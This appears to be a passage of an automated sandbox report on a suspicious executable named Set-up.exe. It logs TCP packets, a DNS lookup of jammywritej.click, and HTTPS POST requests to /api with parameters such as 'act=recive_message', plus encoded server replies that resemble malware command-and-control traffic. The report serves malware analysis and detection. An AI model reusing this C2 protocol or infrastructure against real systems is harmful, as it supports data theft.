Dec 28, 2024 12:19:22.400614977 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:23.612903118 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:23.612991095 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:23.614705086 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:23.614722013 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:23.614928961 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:23.624547005 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:23.624789953 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:23.624794960 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:24.370099068 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:24.370178938 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:24.370349884 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:24.370409966 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:24.370424986 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:25.002433062 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:25.002517939 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:25.002618074 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:25.003089905 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:25.003124952 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.215728998 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.215811014 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.217066050 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.217091084 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.217427015 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.225263119 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.225972891 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.226030111 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.226187944 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.226231098 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.226408958 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.226458073 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.226610899 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.226648092 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.226814985 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.226854086 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.227039099 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.227085114 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.271338940 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.271521091 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.271564007 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.315361977 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.315586090 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.315665960 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.315685987 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.359371901 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.359591007 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.359663010 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.403368950 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.403510094 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.451335907 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.466141939 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.466308117 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:26.466367006 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:26.466403961 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:29.811100006 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:29.811239004 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:29.811343908 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:29.831811905 CET	49748	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:29.831859112 CET	443	49748	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:30.475454092 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:30.475506067 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:30.475572109 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:30.476063967 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:30.476075888 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:31.734685898 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:31.734777927 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:31.738687992 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:31.738697052 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:31.739039898 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:31.744612932 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:31.744633913 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:31.744697094 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.519366980 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.519450903 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.519494057 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.519505024 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.519526005 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.519561052 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.519563913 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.519589901 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.519623995 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.519633055 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.527802944 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.527878046 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.527889013 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.536191940 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.536240101 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.536250114 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.548793077 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.548865080 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.548876047 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.548898935 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.548950911 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.549048901 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.549065113 CET	443	49749	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:32.549078941 CET	49749	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:32.549083948 CET	443	49749	104.21.87.112	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:19:09.758306980 CET	51501	53	192.168.2.4	1.1.1.1
Dec 28, 2024 12:19:10.063929081 CET	53	51501	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 12:19:09.758306980 CET	192.168.2.4	1.1.1.1	0xba47	Standard query (0)	jammywritej.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 12:19:10.063929081 CET	1.1.1.1	192.168.2.4	0xba47	No error (0)	jammywritej.click		104.21.87.112	A (IP address)	IN (0x0001)	false
Dec 28, 2024 12:19:10.063929081 CET	1.1.1.1	192.168.2.4	0xba47	No error (0)	jammywritej.click		172.67.143.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jammywritej.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 11:19:11 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: jammywritej.click
2024-12-28 11:19:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 11:19:12 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2pnbfbrkjk2c9enc30moc171e9; expires=Wed, 23 Apr 2025 05:05:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sf7OwNE4HoYPifZXuBn0qSAHFF3NMvZBmnFyKRi4lMGw1bFcGLQMjhG3DDkdoDZ1TZRFBIkD2GM%2BZ%2BSJvqgnvZ%2BEcw1rlNgFtpjbRLDjFMS2hYex9iz9wOU4t1NJJJwOawoIww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f912769ec2c726f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1785&rtt_var=720&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1469552&cwnd=172&unsent_bytes=0&cid=e10b0c0f243cf8fb&ts=888&x=0"
2024-12-28 11:19:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 11:19:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 11:19:13 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: jammywritej.click
2024-12-28 11:19:13 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 59 75 45 46 42 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=qYuEFB--&j=
2024-12-28 11:19:14 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6avkplpersj2ejko3250i5keji; expires=Wed, 23 Apr 2025 05:05:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCgXgZuh1C1B9PULO6DYPCMqLT%2BOX6tfbNLIb%2FdRDfQhtebraXF0TVin9v0EbT1E2sk8vp2y1qltilQmh2V0m%2Fc0fh%2FR0EQ3RZIOqjNxKuWeZMluxjAH9ganm0Dt9UTn%2Fj%2F36A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9127775e6f4402-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1657&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=943&delivery_rate=1750599&cwnd=182&unsent_bytes=0&cid=47037bf3c164d354&ts=855&x=0"
2024-12-28 11:19:14 UTC	234	IN	Data Raw: 32 64 31 31 0d 0a 6d 71 34 69 4e 51 73 61 62 6e 6b 2f 32 75 79 38 76 6a 73 70 72 77 7a 37 6f 65 34 68 31 71 65 4b 59 70 38 50 4e 4b 37 6b 4a 6b 54 68 6a 46 51 58 4d 53 35 43 57 30 79 2f 7a 6f 62 4b 53 56 7a 4b 49 4e 6e 41 69 67 50 73 77 65 73 4f 37 47 6f 59 6a 4a 4a 4c 5a 71 44 49 51 31 6c 34 66 30 4a 62 57 71 4c 4f 68 75 56 41 43 38 70 69 32 5a 76 4d 52 4c 7a 46 36 77 37 39 62 6c 2f 42 6c 45 6f 6e 38 73 4a 46 58 57 35 35 43 68 68 54 74 34 6e 5a 32 31 70 44 77 57 57 57 79 59 4d 44 2b 6f 58 76 47 4c 30 31 46 75 4f 42 55 69 58 58 7a 31 46 65 4b 57 64 43 41 68 32 2f 67 70 36 45 47 55 6a 4b 62 70 66 48 69 6b 71 2b 7a 2b 49 47 2f 47 74 65 33 6f 31 41 4c 50 4c 4d 52 6c 78 6b 63 42 34 56 57 62 43 43 Data Ascii: 2d11mq4iNQsabnk/2uy8vjsprwz7oe4h1qeKYp8PNK7kJkThjFQXMS5CW0y/zobKSVzKINnAigPswesO7GoYjJJLZqDIQ1l4f0JbWqLOhuVAC8pi2ZvMRLzF6w79bl/BlEon8sJFXW55ChhTt4nZ21pDwWWWyYMD+oXvGL01FuOBUiXXz1FeKWdCAh2/gp6EGUjKbpfHikq+z+IG/Gte3o1ALPLMRlxkcB4VWbCC
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 33 39 46 61 43 34 4d 75 6e 74 76 4d 47 2f 53 57 32 67 50 73 66 45 50 42 6c 6b 4a 6d 35 34 4a 5a 46 32 35 30 54 45 4d 64 73 49 4c 51 32 56 70 45 79 6d 2b 5a 30 59 4e 44 74 38 33 67 42 50 64 69 57 63 4f 49 54 69 48 77 78 55 64 59 62 6e 41 4b 46 46 37 34 77 4a 37 62 51 51 75 56 4c 72 6e 54 6a 30 43 67 79 50 6c 41 34 69 4e 50 6a 49 46 49 5a 71 43 4d 52 6c 6c 6f 64 51 77 4a 56 62 4f 46 32 38 35 53 51 73 42 6a 6d 63 36 47 54 4c 66 46 37 77 72 33 59 6c 7a 49 69 30 6b 67 2b 4d 77 41 47 53 6c 2f 46 46 73 46 2b 4b 33 62 7a 46 35 48 32 79 79 6a 67 35 4d 4e 72 59 58 76 44 4c 30 31 46 73 53 44 52 79 58 7a 77 30 4e 66 59 6d 6f 4d 43 56 75 31 69 38 7a 61 58 45 58 48 62 59 76 4a 67 6b 57 33 7a 4f 4d 4a 2b 47 70 53 6a 4d 67 45 49 65 43 4d 47 42 64 49 64 51 63 58 56 36 2b Data Ascii: 39FaC4MuntvMG/SW2gPsfEPBlkJm54JZF250TEMdsILQ2VpEym+Z0YNDt83gBPdiWcOITiHwxUdYbnAKFF74wJ7bQQuVLrnTj0CgyPlA4iNPjIFIZqCMRllodQwJVbOF285SQsBjmc6GTLfF7wr3YlzIi0kg+MwAGSl/FFsF+K3bzF5H2yyjg5MNrYXvDL01FsSDRyXzw0NfYmoMCVu1i8zaXEXHbYvJgkW3zOMJ+GpSjMgEIeCMGBdIdQcXV6+
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 31 6e 4e 59 6f 76 50 68 6b 57 37 79 4f 52 41 73 79 31 52 31 4d 59 63 5a 74 4c 50 56 46 52 6a 4f 6a 6b 59 55 37 61 4a 79 4a 78 47 42 64 51 75 6e 73 2f 4d 47 2f 54 49 36 51 6a 37 66 31 6e 42 68 55 6f 6f 39 38 6c 50 58 32 6c 34 41 52 35 5a 73 34 58 64 30 56 31 5a 78 32 36 52 78 6f 31 4a 76 6f 57 6d 51 50 70 31 46 70 54 47 64 54 48 7a 6a 6e 56 55 5a 33 59 4c 44 52 32 6e 77 4d 65 63 58 6b 65 4e 4e 74 6e 4f 68 45 61 78 79 75 6b 4b 38 32 68 63 77 49 35 4b 4a 65 72 44 52 46 64 6c 63 41 59 57 55 37 79 47 31 39 64 53 54 63 31 76 6b 34 50 43 41 37 50 64 71 46 69 39 57 56 48 41 69 30 74 6b 7a 63 39 4f 57 57 35 75 54 41 51 54 6f 63 37 5a 30 42 6b 54 6a 57 4b 51 77 34 64 4a 73 4d 58 76 44 66 68 75 55 63 2b 4c 51 79 7a 32 79 30 52 62 59 48 55 4b 47 31 71 38 69 38 7a 5a Data Ascii: 1nNYovPhkW7yORAsy1R1MYcZtLPVFRjOjkYU7aJyJxGBdQuns/MG/TI6Qj7f1nBhUoo98lPX2l4AR5Zs4Xd0V1Zx26Rxo1JvoWmQPp1FpTGdTHzjnVUZ3YLDR2nwMecXkeNNtnOhEaxyukK82hcwI5KJerDRFdlcAYWU7yG19dSTc1vk4PCA7PdqFi9WVHAi0tkzc9OWW5uTAQToc7Z0BkTjWKQw4dJsMXvDfhuUc+LQyz2y0RbYHUKG1q8i8zZ
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 57 73 7a 5a 6f 44 71 34 76 78 51 50 70 68 46 70 54 47 54 53 2f 71 77 6b 35 65 5a 48 34 45 48 46 4f 31 68 64 6a 58 58 6b 7a 4c 59 35 48 4f 69 55 43 31 77 65 49 53 2f 6d 5a 63 77 59 77 45 61 4c 6a 4c 57 42 63 78 4f 43 73 58 64 4b 69 56 7a 4d 6f 5a 56 49 4e 33 32 63 53 41 41 2b 79 46 36 77 2f 30 59 6c 37 45 69 55 73 69 39 73 70 47 57 6d 78 33 42 67 6c 56 74 6f 50 56 30 31 4a 5a 7a 57 4f 64 7a 34 68 4c 76 38 2b 6f 54 72 31 71 54 6f 7a 65 42 42 50 31 77 30 42 55 66 7a 67 54 56 55 54 34 69 64 4b 63 41 51 76 42 59 4a 6e 4d 67 45 2b 2f 7a 65 6b 4d 38 32 70 54 78 59 35 4d 4e 50 6e 49 53 46 5a 6e 64 77 30 66 57 4c 32 4b 32 64 68 66 52 49 30 67 32 63 53 55 41 2b 79 46 78 79 66 49 4c 33 66 32 78 6c 74 6f 34 59 78 48 57 79 6b 67 54 42 64 65 74 49 62 52 32 6c 42 48 78 Data Ascii: WszZoDq4vxQPphFpTGTS/qwk5eZH4EHFO1hdjXXkzLY5HOiUC1weIS/mZcwYwEaLjLWBcxOCsXdKiVzMoZVIN32cSAA+yF6w/0Yl7EiUsi9spGWmx3BglVtoPV01JZzWOdz4hLv8+oTr1qTozeBBP1w0BUfzgTVUT4idKcAQvBYJnMgE+/zekM82pTxY5MNPnISFZndw0fWL2K2dhfRI0g2cSUA+yFxyfIL3f2xlto4YxHWykgTBdetIbR2lBHx
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 47 53 4c 44 47 37 41 58 79 62 46 66 4b 6c 45 4d 76 36 73 4a 4e 57 47 46 77 42 52 70 5a 76 59 50 59 30 46 4e 4b 79 6d 43 58 79 38 77 4e 39 4d 4c 77 51 4b 55 74 64 39 79 64 56 6a 44 31 37 55 31 59 4b 57 64 43 41 68 32 2f 67 70 36 45 47 55 4c 66 61 70 54 52 68 55 53 36 79 75 73 53 2f 47 42 64 33 6f 46 4c 49 76 2f 41 52 6c 68 76 65 51 6b 52 55 62 2b 4c 31 64 4e 56 43 34 4d 75 6e 74 76 4d 47 2f 54 72 34 78 50 71 62 6c 6a 48 6b 46 39 6d 35 34 4a 5a 46 32 35 30 54 45 4d 64 75 34 58 56 32 46 6c 48 7a 57 71 55 77 35 35 4d 73 38 4c 68 43 2b 39 6e 55 63 75 4e 54 43 33 33 79 6c 4a 62 5a 32 6f 4a 43 55 2f 34 77 4a 37 62 51 51 75 56 4c 71 2f 45 6e 46 4f 33 68 39 6b 57 2f 6e 74 64 77 59 6f 45 4f 62 62 56 41 46 42 6c 4f 46 52 62 57 37 65 48 33 64 4e 59 51 73 46 6a 6e 4d Data Ascii: GSLDG7AXybFfKlEMv6sJNWGFwBRpZvYPY0FNKymCXy8wN9MLwQKUtd9ydVjD17U1YKWdCAh2/gp6EGULfapTRhUS6yusS/GBd3oFLIv/ARlhveQkRUb+L1dNVC4MuntvMG/Tr4xPqbljHkF9m54JZF250TEMdu4XV2FlHzWqUw55Ms8LhC+9nUcuNTC33ylJbZ2oJCU/4wJ7bQQuVLq/EnFO3h9kW/ntdwYoEObbVAFBlOFRbW7eH3dNYQsFjnM
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 2f 65 4d 4f 7a 32 35 4e 6a 4a 6b 4b 50 37 6a 4c 54 42 63 78 4f 41 38 63 58 72 6d 45 31 39 42 57 54 4d 6c 38 6b 38 53 65 51 72 58 4f 35 51 7a 39 59 46 76 47 68 30 30 72 39 4d 46 48 55 47 5a 39 54 46 55 64 76 35 61 65 68 42 6c 71 77 47 57 56 6d 4e 59 44 71 34 76 78 51 50 70 68 46 70 54 47 52 43 7a 39 78 6b 31 55 5a 6e 73 65 47 6c 75 71 6a 74 50 57 53 30 48 47 61 35 54 4f 67 55 43 79 77 2b 4d 4d 37 32 52 57 7a 34 30 45 61 4c 6a 4c 57 42 63 78 4f 43 38 4d 53 37 4b 4a 30 73 70 53 53 73 35 34 6c 4e 50 4d 44 66 54 55 37 78 47 39 4e 55 44 63 6b 55 4d 35 74 74 55 41 55 47 55 34 56 46 74 62 73 59 6a 5a 32 6c 64 5a 79 47 69 57 7a 49 56 4b 73 4d 33 72 41 50 6c 70 55 63 6d 46 53 43 33 2f 7a 30 39 54 59 48 59 46 46 42 33 32 7a 74 6e 45 47 52 4f 4e 54 34 4c 41 67 45 37 Data Ascii: /eMOz25NjJkKP7jLTBcxOA8cXrmE19BWTMl8k8SeQrXO5Qz9YFvGh00r9MFHUGZ9TFUdv5aehBlqwGWVmNYDq4vxQPphFpTGRCz9xk1UZnseGluqjtPWS0HGa5TOgUCyw+MM72RWz40EaLjLWBcxOC8MS7KJ0spSSs54lNPMDfTU7xG9NUDckUM5ttUAUGU4VFtbsYjZ2ldZyGiWzIVKsM3rAPlpUcmFSC3/z09TYHYFFB32ztnEGRONT4LAgE7
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 2f 51 74 47 49 79 42 58 47 61 67 6a 47 42 63 66 33 30 4c 44 52 2b 4e 6a 64 44 53 58 6c 32 4e 63 61 61 4e 7a 45 79 75 68 62 41 35 35 43 31 52 77 4d 59 63 5a 75 33 4c 51 46 42 7a 62 67 73 58 54 4c 4f 44 30 76 35 57 54 4e 74 74 6c 73 43 64 53 76 6a 4f 35 55 43 7a 4c 56 48 55 78 68 78 6d 31 38 74 57 56 45 5a 37 48 52 49 64 39 73 37 5a 79 68 6b 54 6a 56 44 5a 30 59 39 54 74 38 72 35 50 72 30 31 54 2f 4c 47 54 7a 44 2f 33 45 4e 42 59 6e 55 41 43 6d 50 34 31 6f 71 4f 43 78 6d 66 50 49 61 44 6b 33 7a 36 68 65 6c 41 70 56 52 50 6a 4a 41 45 66 71 71 43 41 45 55 70 49 45 78 63 58 71 71 63 32 4e 39 50 53 49 70 51 70 2b 53 61 53 62 50 56 37 78 66 79 4c 52 69 4d 69 51 52 2b 77 59 78 4a 55 48 4a 70 47 68 5a 4e 76 38 37 68 6b 68 6c 54 6a 54 62 5a 39 6f 39 4e 75 73 4c 2b Data Ascii: /QtGIyBXGagjGBcf30LDR+NjdDSXl2NcaaNzEyuhbA55C1RwMYcZu3LQFBzbgsXTLOD0v5WTNttlsCdSvjO5UCzLVHUxhxm18tWVEZ7HRId9s7ZyhkTjVDZ0Y9Tt8r5Pr01T/LGTzD/3ENBYnUACmP41oqOCxmfPIaDk3z6helApVRPjJAEfqqCAEUpIExcXqqc2N9PSIpQp+SaSbPV7xfyLRiMiQR+wYxJUHJpGhZNv87hkhlTjTbZ9o9NusL+
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 58 61 68 51 4d 59 78 73 31 4e 57 43 56 32 42 78 74 61 71 4a 6a 46 6b 46 46 49 31 33 53 6e 2f 61 64 50 73 73 4c 79 42 2f 74 4c 64 6f 7a 49 42 43 6d 34 6c 48 6b 58 49 54 67 7a 56 52 32 67 7a 6f 61 63 62 45 6a 44 59 4a 37 56 6e 51 36 63 35 74 49 36 76 30 46 52 32 63 52 77 49 65 6a 64 53 31 70 6c 4f 45 4a 62 57 2f 6a 57 6a 70 49 5a 54 39 77 75 77 5a 50 65 47 4f 47 57 76 31 43 76 63 68 6a 56 78 6c 4a 6d 6f 4a 34 4f 46 33 73 34 56 46 73 61 75 35 7a 4d 32 6c 70 64 7a 69 6d 6e 2f 61 74 4e 73 38 54 2b 45 4f 70 69 61 50 4b 54 52 79 6a 32 79 31 5a 47 4b 54 5a 4d 46 42 33 67 74 35 36 55 47 58 53 44 4c 6f 47 44 31 41 4f 42 78 75 59 4f 2b 6e 74 48 67 61 46 4b 49 66 6e 61 55 45 42 6d 4f 45 4a 62 57 2f 6a 57 6a 4a 49 5a 54 39 77 75 77 5a 50 65 47 4f 47 57 76 31 43 76 63 Data Ascii: XahQMYxs1NWCV2BxtaqJjFkFFI13Sn/adPssLyB/tLdozIBCm4lHkXITgzVR2gzoacbEjDYJ7VnQ6c5tI6v0FR2cRwIejdS1plOEJbW/jWjpIZT9wuwZPeGOGWv1CvchjVxlJmoJ4OF3s4VFsau5zM2lpdzimn/atNs8T+EOpiaPKTRyj2y1ZGKTZMFB3gt56UGXSDLoGD1AOBxuYO+ntHgaFKIfnaUEBmOEJbW/jWjJIZT9wuwZPeGOGWv1Cvc
2024-12-28 11:19:14 UTC	1369	IN	Data Raw: 44 5a 4e 6e 47 55 46 70 6d 66 30 34 37 57 71 36 4e 6e 70 49 5a 52 34 30 32 32 63 4b 47 55 37 6e 4b 37 30 7a 36 64 31 47 4d 79 41 51 6f 75 4a 51 41 56 6d 4e 6f 41 52 52 61 39 49 6a 51 30 68 6c 55 67 33 66 5a 31 63 77 62 35 34 75 6f 45 72 30 31 46 6f 75 46 56 6a 54 2b 7a 31 5a 55 4c 6b 59 79 4e 6b 2b 2f 6e 74 32 65 61 45 62 4a 65 49 7a 41 6e 45 53 4b 2b 38 55 53 2b 6e 31 56 6a 72 64 53 4a 66 6a 43 52 78 63 6e 4f 42 52 62 42 66 69 6a 7a 4e 74 4a 53 49 30 67 32 63 2f 4d 47 2f 54 49 2b 67 66 74 62 68 72 4c 6e 45 4e 6d 35 34 4a 5a 46 33 38 34 56 45 67 54 2b 4a 79 65 68 42 6b 4d 77 32 4f 59 77 49 4a 41 70 74 66 75 41 2b 74 75 45 66 4b 34 61 54 54 2f 33 45 4d 56 57 48 55 49 44 55 69 37 6e 74 6e 69 5a 32 62 66 61 59 6e 41 7a 6d 2b 7a 79 4f 51 2b 77 31 70 48 79 35 Data Ascii: DZNnGUFpmf047Wq6NnpIZR4022cKGU7nK70z6d1GMyAQouJQAVmNoARRa9IjQ0hlUg3fZ1cwb54uoEr01FouFVjT+z1ZULkYyNk+/nt2eaEbJeIzAnESK+8US+n1VjrdSJfjCRxcnOBRbBfijzNtJSI0g2c/MG/TI+gftbhrLnENm54JZF384VEgT+JyehBkMw2OYwIJAptfuA+tuEfK4aTT/3EMVWHUIDUi7ntniZ2bfaYnAzm+zyOQ+w1pHy5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
